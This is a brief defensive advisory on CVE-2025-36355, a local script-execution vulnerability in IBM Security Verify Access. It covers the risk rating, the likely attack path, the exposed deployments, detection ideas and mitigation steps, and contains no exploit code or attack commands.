CVE Alert: CVE-2025-36355 – IBM – Security Verify Access Appliance

Risk verdict

High risk: a locally authenticated user can execute malicious scripts with elevated impact; currently no known active exploitation, but the combination of high base score and changed scope warrants prompt remediation.

Why this matters

If exploited, an attacker could run code within the affected IBM Security Verify Access components, exposing confidential data and undermining integrity. The changed scope implies potential to affect adjacent services or components, increasing blast radius in enterprise deployments.

Most likely attack path

• Preconditions: local access with a valid account; no user interaction required.
• Attacker objective: execute scripts from outside the component’s normal control sphere, with access to data and processes associated with the vulnerable host.
• Lateral movement potential: limited by local access, but the changed scope indicates risk of broader impact within connected systems or containers.

Who is most exposed

On-premises appliances and Docker deployments of IBM Security Verify Access, especially where management interfaces are reachable from internal networks or VPN-secured segments.

Detection ideas

• Unexpected script execution events on the appliance/container host.
• New or modified scripts/files in application directories.
• Local-login events from non-administrative users outside normal windows, or unusual login patterns to management interfaces.
• Anomalous process trees or child processes spawned by the vulnerable component.
• Elevated privilege or script execution alerts tied to the Verify Access environment.

Mitigation and prioritisation

• Apply vendor patch upgrade to fixed builds per IBM advisory; verify coverage across all appliances and Docker images.
• Enforce strict local-access controls: limit management interfaces to trusted networks, disable unnecessary local accounts, require MFA where feasible.
• Implement application allowlisting and restrict script execution within the affected components.
• Enable enhanced logging and EDR coverage for the Verify Access processes; monitor for anomalous script/process activity.
• Plan patching in a controlled change window with backups and a rollback path; if patching is delayed, implement compensating controls and isolate affected systems.